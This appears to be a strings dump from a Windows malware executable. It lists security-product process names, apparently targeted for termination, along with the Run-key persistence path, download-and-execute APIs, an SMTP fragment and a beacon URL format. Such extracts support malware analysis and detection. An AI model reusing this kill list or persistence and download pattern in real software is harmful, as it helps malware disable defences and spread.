SetThreadAffinityMask
SETUP_FLOWPROTECTOR_US.EXE
SETUPVAMEEVAL.EXE
SFC.EXE
SGSSFW32.EXE
SharedAccess
shell32.dll
ShellExecuteA
SHELLSPYINSTALL.EXE
Shell_TrayWnd
SH.EXE
shlwapi.dll
SHN.EXE
SMC.EXE
socket
SOFI.EXE
SOFTWARE\DateTime8
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SPF.EXE
SPHINX.EXE
%s?p=%lu&id=%s
SPYXX.EXE
SS3EDIT.EXE
ssgrate.exe
ST2.EXE
StrDupA
StrRChrA
StrRChrIA
StrStrIA
StrToIntA
strtok
StrTrimA
SUPFTRL.EXE
SUPPORTER5.EXE
SYMPROXYSVC.EXE
SYSEDIT.EXE
szNotifyIdent
TASKMON.EXE
TAUMON.EXE
TAUSCAN.EXE
TCA.EXE
TC.EXE
TCM.EXE
TDS2-98.EXE
TDS2-NT.EXE
TDS-3.EXE
TerminateProcess
TerminateThread
TFAK5.EXE
TGBOB.EXE
!This program cannot be run in DOS mode.
TITANIN.EXE
TITANINXP.EXE
TRACERT.EXE
TRJSCAN.EXE
TRJSETUP.EXE
TROJANTRAP3.EXE
tyjopoihhRCPT TO:
UNDOBOOT.EXE
UPDATE.EXE
URLDownloadToFileA
urlmon.dll
user32.dll
USER32.DLL
VBCMSERV.EXE
VBCONS.EXE
VBUST.EXE
VBWIN9X.EXE
VBWINNTW.EXE
VCSETUP.EXE
VFSETUP.EXE
VirtualAlloc
VirtualFree
VIRUSMDPERSONALFIREWALL.EXE
VNLAN300.EXE
VNPC3000.EXE
VPC42.EXE
VPFW30S.EXE
VPTRAY.EXE
VSCENU6.02D30.EXE
VSECOMR.EXE
VSHWIN32.EXE
VSISETUP.EXE
VSMAIN.EXE
VSMON.EXE
VSSTAT.EXE
VSWIN9XE.EXE
VSWINNTSE.EXE
VSWINPERSE.EXE
VWSh6!
W32DSM89.EXE
W9X.EXE
WaitForSingleObject
WATCHDOG.EXE
WEBSCANX.EXE
WGFE95.EXE
WHOSWATCHINGME.EXE
WinExec
wininet.dll
WINRECON.EXE
\winsystems.exe
WNT.EXE
WRADMIN.EXE
WRCTRL.EXE
WriteFile
WriteProcessMemory
WSACleanup
__WSAFDIsSet
WSAStartup
WSBGATE.EXE
wscsvc
wsock32.dll
wsock.dll
wsprintfA
WYVERNWORKSFIREWALL.EXE
x :(4f
XPF202EN.EXE
yWHHH@
YX_^][
ZAPRO.EXE
ZAPSETUP3001.EXE
ZATUTOR.EXE
ZAUINST.EXE
ZONALM2601.EXE
ZONEALARM.EXE